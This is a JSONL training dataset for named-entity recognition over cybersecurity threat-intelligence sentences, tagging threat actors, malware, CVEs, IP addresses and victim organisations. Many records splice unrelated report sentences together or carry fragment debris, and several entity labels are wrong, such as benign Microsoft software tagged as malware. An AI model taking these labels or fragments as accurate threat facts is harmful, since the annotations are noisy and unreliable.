{"text": "The complete list of apps can be seen below . It employs AES in addition to SID tricks , making it difficult to decrypt sensitive data . FinSpy , a final-stage payload that allows for an attacker to covertly learn what a target is talking about and who they are communicating with , is associated with Gamma Group — which goes by other names , including FinFisher and Lench IT Solutions . An APT32 backdoor can use HTTP over a non - standard TCP port ( e.g 14146 ) which is specified in the backdoor configuration.[5 ]", "spans": {"TOOL: AES": [[57, 60]], "TOOL: SID": [[76, 79]], "MALWARE: FinSpy": [[137, 143]], "THREAT_ACTOR: Gamma Group": [[302, 313]], "THREAT_ACTOR: FinFisher": [[354, 363]], "THREAT_ACTOR: Lench IT Solutions": [[368, 386]], "MALWARE: APT32 backdoor": [[392, 406]]}, "info": {"id": "cyberner_stix_train_003947", "source": "cyberner_stix_train"}}
{"text": "As seen in Figure 2 , the app tries to open the payload from the /res/raw/ directory and generate an additional Android Package Kit ( APK ) named .app.apk : Decoy Code Figure 2 : The decoy code for the fake TikTok . Through our continuous monitoring of threats during 2018 , we observed a new wave of attacks by Gaza Cybergang Group1 targeting embassies and political personnel . Additionally , the operators could leverage this feature when infecting internet-facing devices in a targeted organization to allow them to reenter a network if evicted from internal hosts .", "spans": {"SYSTEM: Android Package Kit": [[112, 131]], "SYSTEM: TikTok": [[207, 213]], "THREAT_ACTOR: Gaza Cybergang Group1": [[312, 333]], "ORGANIZATION: embassies": [[344, 353]], "ORGANIZATION: political personnel": [[358, 377]]}, "info": {"id": "cyberner_stix_train_003948", "source": "cyberner_stix_train"}}
{"text": "The Moscow Institute of Physics and Technology ( PsyTech ) , which specializes in applied physics , computing science , chemistry , and biology .", "spans": {"ORGANIZATION: Physics and Technology": [[24, 46]], "ORGANIZATION: PsyTech": [[49, 56]]}, "info": {"id": "cyberner_stix_train_003949", "source": "cyberner_stix_train"}}
{"text": "Components of TG-4127 operations have been reported under the names APT28 , Sofacy , Sednit , and Pawn Storm .", "spans": {"THREAT_ACTOR: TG-4127": [[14, 21]], "THREAT_ACTOR: APT28": [[68, 73]], "THREAT_ACTOR: Sofacy": [[76, 82]], "THREAT_ACTOR: Sednit": [[85, 91]], "THREAT_ACTOR: Pawn Storm": [[98, 108]]}, "info": {"id": "cyberner_stix_train_003950", "source": "cyberner_stix_train"}}
{"text": "In Russia , some major banks offer their clients a special service that allows them to transfer money from their bank card to their mobile phone account . Finally , there are many similarities between Gazer and other second stage backdoors used by the Turla group such as Carbon and Kazuar . Winnti : oci.dll . ThreatConnect collects realtime intelligence from the CISA Known Exploited Vulnerabilities Catalog and Google Project Zero , as well as other feeds and sources , enriching it with insights from sources such as the National Vulnerability Database NVD and the global ThreatConnect community .", "spans": {"TOOL: Gazer": [[201, 206]], "TOOL: backdoors": [[230, 239]], "THREAT_ACTOR: Turla": [[252, 257]], "THREAT_ACTOR: Carbon": [[272, 278]], "THREAT_ACTOR: Kazuar": [[283, 289]], "THREAT_ACTOR: Winnti": [[292, 298]], "FILEPATH: oci.dll": [[301, 308]], "ORGANIZATION: ThreatConnect": [[311, 324]], "ORGANIZATION: CISA Known Exploited Vulnerabilities Catalog": [[365, 409]], "ORGANIZATION: Google Project Zero": [[414, 433]], "ORGANIZATION: National Vulnerability Database NVD and": [[525, 564]], "ORGANIZATION: ThreatConnect community": [[576, 599]]}, "info": {"id": "cyberner_stix_train_003951", "source": "cyberner_stix_train"}}
{"text": "APT33 's focus on aviation may indicate the group 's desire to gain insight into regional military aviation capabilities to enhance Iran 's aviation capabilities or to support Iran 's military and strategic decision making . It wasn't until August 2014 that we observed something which made us wonder if RedOctober is back for good .", "spans": {"THREAT_ACTOR: APT33": [[0, 5]], "ORGANIZATION: aviation": [[18, 26], [140, 148]], "ORGANIZATION: military": [[184, 192]]}, "info": {"id": "cyberner_stix_train_003952", "source": "cyberner_stix_train"}}
{"text": "] it Milano server2rc.exodus.connexxa [ . XENOTIME rose to prominence in December 2017 when Dragos and FireEye jointly published details of TRISIS destructive malware targeting Schneider Electric 's Triconex safety instrumented system . Ekspertyza means expertise or examination in Ukranian . Based on evidence of lateral movement , the attacker potentially had access to the SCADA system for up to three months .", "spans": {"THREAT_ACTOR: XENOTIME": [[42, 50]], "ORGANIZATION: Dragos": [[92, 98]], "ORGANIZATION: FireEye": [[103, 110]], "TOOL: TRISIS": [[140, 146]], "THREAT_ACTOR: attacker": [[337, 345]], "SYSTEM: SCADA system": [[376, 388]]}, "info": {"id": "cyberner_stix_train_003953", "source": "cyberner_stix_train"}}
{"text": "There are some interesting facts here .", "spans": {}, "info": {"id": "cyberner_stix_train_003954", "source": "cyberner_stix_train"}}
{"text": "Moving through the infection process , NetWitness Endpoint detects the initial exploit CVE-2017-1182 in action as the Microsoft Equation Editor , EQNEDT32.exe , scores high for potentially malicious activity . Anomali Researchers were able to identify multiple samples of malicious RTF documents ITW using the same exploit for CVE-2018-0798 .", "spans": {"VULNERABILITY: CVE-2017-1182": [[87, 100]], "MALWARE: Microsoft Equation Editor": [[118, 143]], "MALWARE: EQNEDT32.exe": [[146, 158]], "ORGANIZATION: Anomali": [[210, 217]], "FILEPATH: ITW": [[296, 299]], "VULNERABILITY: exploit": [[315, 322]], "VULNERABILITY: CVE-2018-0798": [[327, 340]]}, "info": {"id": "cyberner_stix_train_003955", "source": "cyberner_stix_train"}}
{"text": "Unit 26165 appears to be the organization behind at least part of the \"threat group\" of tools , techniques , and procedures known as \" Fancy Bear , \" \" Sofacy , \" \" APT28 , \" and \" Sednit \" .", "spans": {"THREAT_ACTOR: Unit 26165": [[0, 10]], "THREAT_ACTOR: Fancy Bear": [[135, 145]], "THREAT_ACTOR: Sofacy": [[152, 158]], "THREAT_ACTOR: APT28": [[165, 170]], "THREAT_ACTOR: Sednit": [[181, 187]]}, "info": {"id": "cyberner_stix_train_003956", "source": "cyberner_stix_train"}}
{"text": "The ‘ onload1 ’ function then sends an HTTP GET request to the C2 domain using the value stored in the ‘ r3 ’ variable as a URL .", "spans": {"TOOL: C2": [[63, 65]]}, "info": {"id": "cyberner_stix_train_003957", "source": "cyberner_stix_train"}}
{"text": "While TG-4127 continues to primarily threaten organizations and individuals operating in Russia and former Soviet states , this campaign illustrates its willingness to expand its scope to other targets that have intelligence of interest to the Russian government .", "spans": {"THREAT_ACTOR: TG-4127": [[6, 13]]}, "info": {"id": "cyberner_stix_train_003958", "source": "cyberner_stix_train"}}
{"text": "The main goal of Silence.Downloader is to receive an executable file and run it on an infected machine . In early July 2015 , however , Kaspersky Lab found a sample that creates a decryption key with Salt1 , Salt2 , and Salt3 .", "spans": {"MALWARE: Silence.Downloader": [[17, 35]], "ORGANIZATION: Kaspersky Lab": [[136, 149]]}, "info": {"id": "cyberner_stix_train_003959", "source": "cyberner_stix_train"}}
{"text": "In this blog , we will discuss one of the efforts which leveraged tools that have been known to be associated with the Sofacy group .", "spans": {"THREAT_ACTOR: Sofacy": [[119, 125]]}, "info": {"id": "cyberner_stix_train_003960", "source": "cyberner_stix_train"}}
{"text": "Each sample contains a userId hardcoded , meaning that each sample can only be used in a victim . The attackers used different command and control servers ( C2s ) for each malware family , a tactic we believe was meant to thwart attempts to tie the attacks together using infrastructure alone . Similar Targets were observed where the threat actors utilized this backdoor : Japanese Tech Company , Taiwanese Government Organizations , Organizations in the Asia-Pacific Region that are of Interest to China . During the SolarWinds Compromise , APT29 used different compromised credentials for remote access and to move laterally .", "spans": {"TOOL: command and control servers": [[127, 154]], "ORGANIZATION: Japanese Tech Company": [[374, 395]], "ORGANIZATION: Taiwanese Government": [[398, 418]], "THREAT_ACTOR: the SolarWinds Compromise": [[515, 540]], "THREAT_ACTOR: APT29": [[543, 548]]}, "info": {"id": "cyberner_stix_train_003961", "source": "cyberner_stix_train"}}
{"text": "Harvested credentials provided by an embedded Mimikatz executable facilitate the infection of other systems on the network . The backdoor was delivered via a malicious .rtf file that exploited CVE-2017-0199 .", "spans": {"MALWARE: Mimikatz": [[46, 54]], "FILEPATH: .rtf file": [[168, 177]], "VULNERABILITY: CVE-2017-0199": [[193, 206]]}, "info": {"id": "cyberner_stix_train_003962", "source": "cyberner_stix_train"}}
{"text": "] top/ Oct 23 , 2017 hxxp : //online.bankaustria.at.id8817466 [ . The diagram below illustrates how we believe the actors behind the Sea Turtle campaign used DNS hijacking to achieve their end goals . Unknown .", "spans": {"MALWARE: Sea Turtle": [[133, 143]]}, "info": {"id": "cyberner_stix_train_003963", "source": "cyberner_stix_train"}}
{"text": "] site , photolike [ . TG-3390 is capable of using a C2 infrastructure that spans multiple networks and registrars . Based on a bashtemp directory of the latest sample we found , there are other compiled ELF scripts , named init and init2 , that loops the kit to keep running : However , a log file on the server indicates that the C2 framework has been active since at least September 2017 , and probably \" hosted on different servers over time . \"", "spans": {"THREAT_ACTOR: TG-3390": [[23, 30]], "TOOL: ELF": [[204, 207]], "FILEPATH: init": [[224, 228]], "FILEPATH: init2": [[233, 238]]}, "info": {"id": "cyberner_stix_train_003964", "source": "cyberner_stix_train"}}
{"text": "The address , 176.31.112.10 , is a dedicated server provided by the French OVH hosting company , but is apparently operated by an offshore secure hosting company called CrookServers.com .", "spans": {"IP_ADDRESS: 176.31.112.10": [[14, 27]], "TOOL: OVH": [[75, 78]], "ORGANIZATION: CrookServers.com": [[169, 185]]}, "info": {"id": "cyberner_stix_train_003965", "source": "cyberner_stix_train"}}
{"text": "Notably , cryptocurrency mining malware is being distributed using various tactics , typically in an opportunistic and indiscriminate manner so cyber criminals will maximize their outreach and profits . One of them – ipv4.dll – has been placed by the APT with what is , in fact , a downloader for other malicious components .", "spans": {"TOOL: various tactics": [[67, 82]], "THREAT_ACTOR: cyber criminals": [[144, 159]], "FILEPATH: ipv4.dll": [[217, 225]], "MALWARE: downloader": [[282, 292]]}, "info": {"id": "cyberner_stix_train_003966", "source": "cyberner_stix_train"}}
{"text": "Triada steals the money either from the users — if they haven ’ t succeeded in purchasing whatever they wanted , or from the app developers , in case the user has completed the purchase successfully . Wild Neutron 's attack took advantage of a Java zero-day exploit and used hacked forums as watering holes . While the malware deployed is not terribly sophisticated , it uses techniques such as DNS command and control ( C2 ) that allows it to stay under the radar at many establishments .", "spans": {"MALWARE: Triada": [[0, 6]], "THREAT_ACTOR: Wild Neutron": [[201, 213]], "VULNERABILITY: Java zero-day exploit": [[244, 265]], "TOOL: C2": [[421, 423]]}, "info": {"id": "cyberner_stix_train_003968", "source": "cyberner_stix_train"}}
{"text": "Using the device accelerometer sensor it implements a simple pedometer that is used to measure movements of the victim . OceanLotus will release malicious sub-packages in the background , receive the remote control command , steal the privacy information of users such as SMS messages , contacts , call records , geographic locations , and browser records . Other groups attributed to Iranian attackers , such as Rocket Kitten , have targeted Iranian individuals in the past , including anonymous proxy users , researchers , journalists , and dissidents .", "spans": {"THREAT_ACTOR: OceanLotus": [[121, 131]], "THREAT_ACTOR: groups": [[364, 370]], "THREAT_ACTOR: attackers": [[393, 402]], "THREAT_ACTOR: Rocket Kitten": [[413, 426]], "ORGANIZATION: anonymous proxy users": [[487, 508]], "ORGANIZATION: researchers": [[511, 522]], "ORGANIZATION: journalists": [[525, 536]], "ORGANIZATION: dissidents": [[543, 553]]}, "info": {"id": "cyberner_stix_train_003969", "source": "cyberner_stix_train"}}
{"text": "However , a few PHA authors spend substantial effort , time , and money to create and install their harmful app on one or a very small number of devices . As of early June 2018 , the server hosted 112 files in a subdirectory that could be accessed through a public web shell planted by the attackers . APT33 : 192.119.15.36 [REDACTED].ddns.net . While a sudden dip in attacks is n't too unusual for top ransomware gangs , it 's worth mentioning that in last month ’s review we speculated that Royal might be going through a rebrand .", "spans": {"TOOL: public web shell": [[258, 274]], "THREAT_ACTOR: attackers": [[290, 299]], "THREAT_ACTOR: APT33": [[302, 307]], "IP_ADDRESS: 192.119.15.36": [[310, 323]], "DOMAIN: [REDACTED].ddns.net": [[324, 343]], "THREAT_ACTOR: Royal": [[493, 498]]}, "info": {"id": "cyberner_stix_train_003970", "source": "cyberner_stix_train"}}
{"text": "In fact , we believe that by the autumn of 2008 , the Dukes were already developing not one but at least two distinct malware toolsets .", "spans": {}, "info": {"id": "cyberner_stix_train_003971", "source": "cyberner_stix_train"}}
{"text": "We reported the apps to the Google security team and they were swiftly removed . The threat actor behind the campaign , which Kaspersky believes to be the PLATINUM APT group , uses an elaborate , previously unseen , steganographic technique to conceal communication . The library contains the same features as the previous version as well as new ones .", "spans": {"THREAT_ACTOR: actor": [[92, 97]], "ORGANIZATION: Kaspersky": [[126, 135]], "ORGANIZATION: PLATINUM": [[155, 163]]}, "info": {"id": "cyberner_stix_train_003972", "source": "cyberner_stix_train"}}
{"text": "The many changes we see in the way the attacks are performed show that attackers are heavily experimenting to find the best way of infecting a mobile device and abusing existing functionality to perform successful phishing attacks . The new activity described in this blogpost was detected by ESET in Taiwan , where the Plead malware has always been most actively deployed . Advanced persistent threats will remain a problem for companies and organizations of all sizes , especially those with high financial or intellectual property value . We took google - analytics as an example , but other services can also be used .", "spans": {"ORGANIZATION: ESET": [[293, 297]], "TOOL: Plead malware": [[320, 333]], "SYSTEM: google - analytics": [[550, 568]]}, "info": {"id": "cyberner_stix_train_003973", "source": "cyberner_stix_train"}}
{"text": "The formation of the group and the modus operandi changed significantly in early 2017 . The ongoing operation likely began as early as January 2017 and has continued through the first quarter of 2019 .", "spans": {}, "info": {"id": "cyberner_stix_train_003974", "source": "cyberner_stix_train"}}
{"text": "Traditionally , the Ke3chang attackers have used spear-phishing emails with either a malware attachment or a link to a malicious download . we believe the iOS malware gets installed on already compromised systems , and it is very similar to next stage SEDNIT malware we have found for Microsoft Windows’ systems .", "spans": {"THREAT_ACTOR: Ke3chang": [[20, 28]], "THREAT_ACTOR: attackers": [[29, 38]], "FILEPATH: SEDNIT": [[252, 258]], "ORGANIZATION: Microsoft": [[285, 294]]}, "info": {"id": "cyberner_stix_train_003975", "source": "cyberner_stix_train"}}
{"text": "For example , since some banks use anti-fraud solutions that only check device fingerprinting , fraudsters can use the collected information to perform fraudulent transactions from a device that mimics that same fingerprint . The Pitty Tiger group mostly uses spear phishing in order to gain an initial foothold within the targeted environment . BONDUPDATER is a PowerShell-based Trojan first discovered by FireEye in mid-November 2017 , when OilRig targeted a different Middle Eastern governmental organization .", "spans": {"THREAT_ACTOR: Pitty Tiger group": [[230, 247]], "MALWARE: BONDUPDATER": [[346, 357]], "MALWARE: PowerShell-based Trojan": [[363, 386]], "ORGANIZATION: FireEye": [[407, 414]], "THREAT_ACTOR: OilRig": [[443, 449]], "ORGANIZATION: governmental organization": [[486, 511]]}, "info": {"id": "cyberner_stix_train_003976", "source": "cyberner_stix_train"}}
{"text": "Determining if the two groups are related is difficult , but any relationship appears unlikely .", "spans": {}, "info": {"id": "cyberner_stix_train_003977", "source": "cyberner_stix_train"}}
{"text": "In addition , to attack Windows users , they have elaborated a multi-stage infection procedure , and significantly changed the final payload .", "spans": {"SYSTEM: Windows": [[24, 31]]}, "info": {"id": "cyberner_stix_train_003978", "source": "cyberner_stix_train"}}
{"text": "CozyDuke ’s modular platform approach is a clear break from the designs of the previous Duke toolsets .", "spans": {"MALWARE: CozyDuke": [[0, 8]], "THREAT_ACTOR: Duke": [[88, 92]]}, "info": {"id": "cyberner_stix_train_003979", "source": "cyberner_stix_train"}}
{"text": "CTU researchers have discovered numerous details about TG-3390 operations , including how the adversaries explore a network , move laterally , and exfiltrate data .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: TG-3390": [[55, 62]]}, "info": {"id": "cyberner_stix_train_003980", "source": "cyberner_stix_train"}}
{"text": "After the executable is executed , it downloads Pony and Vawtrak malware variants to steal data . It relies on Homebrew , an open source software package manager to install Golang and Tor .", "spans": {"MALWARE: Pony": [[48, 52]], "MALWARE: Vawtrak": [[57, 64]], "TOOL: Homebrew": [[111, 119]], "TOOL: software": [[137, 145]], "TOOL: Golang": [[173, 179]], "TOOL: Tor": [[184, 187]]}, "info": {"id": "cyberner_stix_train_003981", "source": "cyberner_stix_train"}}
{"text": "] ee Backend server ftp [ . On much of the C2 infrastructure we identified several crimeware family samples . Multiple block tracking for getting block comparison variable . None Why are Cyber Criminals More Likely to Target Small to Midsize Businesses \"", "spans": {"THREAT_ACTOR: Cyber Criminals": [[187, 202]], "ORGANIZATION: Small to Midsize Businesses": [[225, 252]]}, "info": {"id": "cyberner_stix_train_003982", "source": "cyberner_stix_train"}}
{"text": "Increasing reliance on public code depositories , such as Carberp , PowerShell Empire , P.A.S. webshell , Metasploit modules , and others in a likely effort to accelerate their development cycle and provide plausible deniability .", "spans": {"MALWARE: Carberp": [[58, 65]], "TOOL: PowerShell": [[68, 78]], "TOOL: Empire": [[79, 85]], "TOOL: P.A.S.": [[88, 94]], "TOOL: Metasploit": [[106, 116]]}, "info": {"id": "cyberner_stix_train_003983", "source": "cyberner_stix_train"}}
{"text": "The individuals using Hancitor malware also known by the name Chanitor are no exception and have taken three approaches to deliver the malware in order to ultimately steal data from their victims . The group , believed to be based in China , has also targeted defense contractors , colleges and universities , law firms , and political organizations — including organizations related to Chinese minority ethnic groups .", "spans": {"THREAT_ACTOR: individuals": [[4, 15]], "TOOL: Hancitor": [[22, 30]], "TOOL: Chanitor": [[62, 70]], "ORGANIZATION: defense contractors": [[260, 279]], "ORGANIZATION: colleges": [[282, 290]], "ORGANIZATION: universities": [[295, 307]], "ORGANIZATION: law firms": [[310, 319]], "ORGANIZATION: political organizations": [[326, 349]], "ORGANIZATION: minority ethnic groups": [[395, 417]]}, "info": {"id": "cyberner_stix_train_003984", "source": "cyberner_stix_train"}}
{"text": "Suspected TEMP.Veles incidents include malicious activity originating from 87.245.143.140 , which is registered to CNIIHM .", "spans": {"THREAT_ACTOR: TEMP.Veles": [[10, 20]], "IP_ADDRESS: 87.245.143.140": [[75, 89]], "ORGANIZATION: CNIIHM": [[115, 121]]}, "info": {"id": "cyberner_stix_train_003985", "source": "cyberner_stix_train"}}
{"text": "It appeared to be geared exclusively towards high profile targets .", "spans": {}, "info": {"id": "cyberner_stix_train_003986", "source": "cyberner_stix_train"}}
{"text": "When the group's activities were detected in one incident , it had elevated privileges and had maintained access to the targeted environment for several months .", "spans": {}, "info": {"id": "cyberner_stix_train_003988", "source": "cyberner_stix_train"}}
{"text": "The executable has a Microsoft Word icon to trick victims into believing they are opening a Word document .", "spans": {"ORGANIZATION: Microsoft": [[21, 30]], "TOOL: Word": [[31, 35], [92, 96]]}, "info": {"id": "cyberner_stix_train_003989", "source": "cyberner_stix_train"}}
{"text": "The group 's most frequently used backdoors belong to a malware family that Microsoft has designated Dipsind , although some variants are detected under different names . Kaspersky Lab 's products detect and neutralize the malicious programs and its variants used by the NetTraveler Toolkit , including Trojan-Spy.Win32.TravNet and Downloader.Win32.NetTraveler .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "ORGANIZATION: Microsoft": [[76, 85]], "TOOL: Dipsind": [[101, 108]], "ORGANIZATION: Kaspersky Lab": [[171, 184]], "MALWARE: NetTraveler Toolkit": [[271, 290]], "MALWARE: Trojan-Spy.Win32.TravNet": [[303, 327]], "MALWARE: Downloader.Win32.NetTraveler": [[332, 360]]}, "info": {"id": "cyberner_stix_train_003990", "source": "cyberner_stix_train"}}
{"text": "The archive is a ZIP containing several files , which is protected with a password . The threat group in this recently observed campaign – TEMP.Zagros – weaponized their malware using the following techniques . This ensures that only one copy of the malware is running at a time . The standard states that the purpose of threat intelligence should be to “ provide awareness of the organization 's threat environment so that the appropriate mitigation actions can be taken . ”", "spans": {"THREAT_ACTOR: threat group": [[89, 101]]}, "info": {"id": "cyberner_stix_train_003992", "source": "cyberner_stix_train"}}
{"text": "Other attacks on Bank Austria customers that we observed resolved to the following .top domains : Oct 23 , 2017 hxxp : //online.bankaustria.at.id8817062 [ . If an attacker was able to compromise an organization's network administrator credentials , the attacker would be able to change that particular organization's DNS records at will . Much of the code used by this group was copied and pasted from online forums .", "spans": {"SYSTEM: Bank Austria": [[17, 29]], "THREAT_ACTOR: attacker": [[163, 171]]}, "info": {"id": "cyberner_stix_train_003993", "source": "cyberner_stix_train"}}
{"text": "Opening the attachment from the email invokes PowerShell and enables command line access to the compromised machine .", "spans": {"TOOL: email": [[32, 37]], "TOOL: PowerShell": [[46, 56]]}, "info": {"id": "cyberner_stix_train_003994", "source": "cyberner_stix_train"}}
{"text": "It then continues executing in a spawned new thread that checks if there are additional undesired modules inside its own virtual address space ( for example , modules injected by certain security solutions ) . Many of the Fetch samples we analyzed attempted to obfuscate their functionality by encrypting their embedded strings using AES . Winnti : T1195 Supply Chain Compromise . Someone motivated by money will likely cast a wide net and look for easy targets .", "spans": {"TOOL: AES": [[334, 337]], "THREAT_ACTOR: Winnti": [[340, 346]]}, "info": {"id": "cyberner_stix_train_003995", "source": "cyberner_stix_train"}}
{"text": "machine code ( same as opcode 0x0 ) 0x18 JGE Jump if greater or equal/Jump if not less 0x19 DEREF Write a register value into a dereferenced pointer 0x1A JMP Special obfuscated “ Jump if below ” opcode 0x1B * Resolve a pointer 0x1C LOAD Load a value into the internal VM descriptor 0x1D JNE Jump if not equal/Jump if not zero 0x1E CALL Call an external function or a function located in the dropper 0x1F MOV Version 2.0 received one update in October 2013 before the malware author released version 3.0 in December 2014 . Winnti : 7cf41b1acfb05064518a2ad9e4c16fde9185cd4b Tue Nov 13 10:12:58 2018 1729131071 8272c1f4 . Simultaneously , a new variant of Monti , based on the Linux platform , has surfaced , demonstrating notable differences from its previous Linux - based versions .", "spans": {"THREAT_ACTOR: Winnti": [[522, 528]], "FILEPATH: 7cf41b1acfb05064518a2ad9e4c16fde9185cd4b": [[531, 571]], "THREAT_ACTOR: Monti": [[653, 658]], "SYSTEM: Linux platform": [[674, 688]]}, "info": {"id": "cyberner_stix_train_003996", "source": "cyberner_stix_train"}}
{"text": "Google and Microsoft have already confirmed the Russian hacker group APT28 used a Flash vulnerability CVE-2016-7855 along with this kernel privilege escalation flaw to perform a targeted attack . At first glance CONFUCIUS_B looks very similar to CONFUCIUS_A , and they are also packaged in plain SFX binary files .", "spans": {"ORGANIZATION: Google": [[0, 6]], "ORGANIZATION: Microsoft": [[11, 20]], "THREAT_ACTOR: APT28": [[69, 74]], "VULNERABILITY: CVE-2016-7855": [[102, 115]], "FILEPATH: CONFUCIUS_B": [[212, 223]], "FILEPATH: CONFUCIUS_A": [[246, 257]], "MALWARE: SFX binary files": [[296, 312]]}, "info": {"id": "cyberner_stix_train_003997", "source": "cyberner_stix_train"}}
{"text": "The usage of the PlusShare API in 2020 denotes some unprofessional development , since this is the API to access Google+ . Iranian Threat Agent Greenbug has been registering domains similar to those of Israeli High-Tech and Cyber Security Companies . This malicious Word document had an MD5 of 499bec15ac83f2c8998f03917b63652e and dropped a backdoor to C:\\DOCUMENTS and SETTINGS\\{user}\\LOCAL SETTINGS\\Temp\\word.exe . During the SolarWinds Compromise , APT29 used scheduler and schtasks to create new tasks on remote host as part of their lateral movement .", "spans": {"SYSTEM: PlusShare": [[17, 26]], "ORGANIZATION: Google+": [[113, 120]], "ORGANIZATION: High-Tech": [[210, 219]], "ORGANIZATION: Cyber Security Companies": [[224, 248]], "FILEPATH: 499bec15ac83f2c8998f03917b63652e": [[294, 326]], "FILEPATH: SETTINGS\\Temp\\word.exe": [[392, 414]], "THREAT_ACTOR: SolarWinds Compromise": [[428, 449]], "THREAT_ACTOR: APT29": [[452, 457]]}, "info": {"id": "cyberner_stix_train_003998", "source": "cyberner_stix_train"}}
{"text": "In May 2018 , campaigns being conducted by SWEED began leveraging another vulnerability in Microsoft Office: CVE-2017-11882 , a remote code execution bug in Microsoft Office that is commonly observed being leveraged in malicious documents used in commodity malware distribution . Unlike earlier attacks when Bemstour was delivered using Buckeye's Pirpi backdoor , in this attack Bemstour was delivered to the victim by a different backdoor Trojan ( Backdoor.Filensfer ) .", "spans": {"THREAT_ACTOR: SWEED": [[43, 48]], "VULNERABILITY: CVE-2017-11882": [[109, 123]], "FILEPATH: Bemstour": [[308, 316]], "FILEPATH: Pirpi": [[347, 352]], "FILEPATH: backdoor": [[353, 361]], "MALWARE: different backdoor": [[421, 439]], "MALWARE: Trojan": [[440, 446]], "MALWARE: Backdoor.Filensfer": [[449, 467]]}, "info": {"id": "cyberner_stix_train_003999", "source": "cyberner_stix_train"}}
{"text": "Smartphones are the dominant form of internet access in the region and Xinjiang was recently above the national average of internet users in China . The first confirmed date when TajMahal samples were seen on a victim’s machine is August 2014 . In March 2014 , the admin@338 leveraged the disappearance of Malaysia Airlines Flight MH370 to target a government in the Asia-Pacific region and a US-based think tank .", "spans": {"MALWARE: TajMahal": [[179, 187]], "THREAT_ACTOR: admin@338": [[265, 274]], "ORGANIZATION: government": [[349, 359]], "ORGANIZATION: think tank": [[402, 412]]}, "info": {"id": "cyberner_stix_train_004000", "source": "cyberner_stix_train"}}
{"text": "The most recent Scarlet Mimic attacks we have identified were conducted in 2015 and suggest the group has a significant interest in both Muslim activists and those interested in critiques of the Russian government and Russian President Vladimir Putin . Finally , this geo-location supports the likely theory that the attackers behind Kimsuky are based in North Korea .", "spans": {"THREAT_ACTOR: group": [[96, 101]], "ORGANIZATION: Muslim activists": [[137, 153]], "THREAT_ACTOR: Kimsuky": [[334, 341]]}, "info": {"id": "cyberner_stix_train_004002", "source": "cyberner_stix_train"}}
{"text": "LAS VEGAS—Today at the Black Hat information security conference , Dell SecureWorks researchers unveiled a report on a newly detected hacking group that has targeted companies around the world while stealing massive amounts of industrial data . FireEye recently published a blog covering the tactics , techniques , and procedures ( TTPs ) for the \" TRITON actor \" when preparing to deploy the TRITON/TRISIS malware framework in 2017 .", "spans": {"ORGANIZATION: Dell SecureWorks": [[67, 83]], "ORGANIZATION: FireEye": [[245, 252]], "MALWARE: TRITON": [[349, 355]], "MALWARE: TRITON/TRISIS": [[393, 406]], "MALWARE: malware": [[407, 414]]}, "info": {"id": "cyberner_stix_train_004003", "source": "cyberner_stix_train"}}
{"text": "This vulnerability was found in a document named Trump's_Attack_on_Syria_English.docx” . OutExtra.exe is a signed legitimate application from Microsoft named finder.exe .", "spans": {"MALWARE: document": [[34, 42]], "VULNERABILITY: Trump's_Attack_on_Syria_English.docx”": [[49, 86]], "FILEPATH: OutExtra.exe": [[89, 101]], "ORGANIZATION: Microsoft": [[142, 151]], "FILEPATH: finder.exe": [[158, 168]]}, "info": {"id": "cyberner_stix_train_004004", "source": "cyberner_stix_train"}}
{"text": "The latter implements the entire spyware program . Charming kitten regularly target international media outlets with Persian-language services . This part takes 90% of the whole launcher code and includes over 11 , 000 modifications . The second , CVE-2022 - 41080 , has not been publicly detailed but its CVSS score of 8.8 is the same as CVE-2022 - 41040 used in the ProxyNotShell exploit chain , and it has been marked “ exploitation more likely . ”", "spans": {"THREAT_ACTOR: Charming kitten": [[51, 66]], "ORGANIZATION: media": [[98, 103]], "VULNERABILITY: CVE-2022 - 41080": [[248, 264]], "VULNERABILITY: CVE-2022 - 41040": [[339, 355]]}, "info": {"id": "cyberner_stix_train_004005", "source": "cyberner_stix_train"}}
{"text": "Examples of file names that are used include : %Temp%\\happiness.txt , %Temp%\\xxxx.exe .", "spans": {"FILEPATH: %Temp%\\happiness.txt": [[47, 67]], "FILEPATH: %Temp%\\xxxx.exe": [[70, 85]]}, "info": {"id": "cyberner_stix_train_004006", "source": "cyberner_stix_train"}}
{"text": "Based on dynamic and static analysis of the malware sample associated with the supservermgr.com domain however , we were able to determine several unique artifacts which allowed us to expand our dataset and discover additional findings .", "spans": {"DOMAIN: supservermgr.com": [[79, 95]]}, "info": {"id": "cyberner_stix_train_004007", "source": "cyberner_stix_train"}}
{"text": "Extract information on pictures from the Gallery . Remsec uses a Lua interpreter to run Lua modules which perform various functions . In particular , these campaigns appear to be related to attacks carried out by a group called MoleRATs ( aka , Gaza Cyber Gang , Moonlight ) , an Arabic-speaking , politically motivated group that has been operating in the Middle East since 2012 . One can only guess how they will be used .", "spans": {"TOOL: Remsec": [[51, 57]], "TOOL: Lua interpreter": [[65, 80]], "TOOL: Lua modules": [[88, 99]], "THREAT_ACTOR: MoleRATs": [[228, 236]], "THREAT_ACTOR: Gaza Cyber Gang": [[245, 260]], "THREAT_ACTOR: Moonlight": [[263, 272]]}, "info": {"id": "cyberner_stix_train_004008", "source": "cyberner_stix_train"}}
{"text": "By performing a deep analysis of the malware , we were able to extract the unpacked JAR file mycode.jar and reveal some very interesting code . We also observed the actors uploading the HyperBro backdoor to one of the webshells , as well as legitimate executables that would sideload malicious DLLs that have overlapping code associated with known Emissary Panda activity . From our analysis , Honeybee submitted most of these documents from South Korea , indicating that some of the targeting was in South Korea .", "spans": {"THREAT_ACTOR: actors": [[165, 171]], "TOOL: HyperBro backdoor": [[186, 203]], "THREAT_ACTOR: Emissary Panda": [[348, 362]], "THREAT_ACTOR: Honeybee": [[394, 402]]}, "info": {"id": "cyberner_stix_train_004009", "source": "cyberner_stix_train"}}
{"text": "How did Gooligan emerge ? APT38 . the lowest bit of the negated value becoming 1 . On 24 February , a cyber - attack against Viasat began approximately 1 hour before Russia launched its major invasion of Ukraine .", "spans": {"MALWARE: Gooligan": [[8, 16]], "THREAT_ACTOR: APT38": [[26, 31]], "ORGANIZATION: Viasat": [[125, 131]]}, "info": {"id": "cyberner_stix_train_004010", "source": "cyberner_stix_train"}}
{"text": "After further analysis , it was discovered that the RTF files were exploiting the CVE-2018-0798 vulnerability in Microsoft’s Equation Editor (EQNEDT32) . LuckyMouse has been spotted using a widely used Microsoft Office vulnerability ( CVE-2017-11882 ) .", "spans": {"MALWARE: RTF files": [[52, 61]], "VULNERABILITY: CVE-2018-0798": [[82, 95]], "TOOL: Microsoft Office": [[202, 218]], "VULNERABILITY: CVE-2017-11882": [[235, 249]]}, "info": {"id": "cyberner_stix_train_004011", "source": "cyberner_stix_train"}}
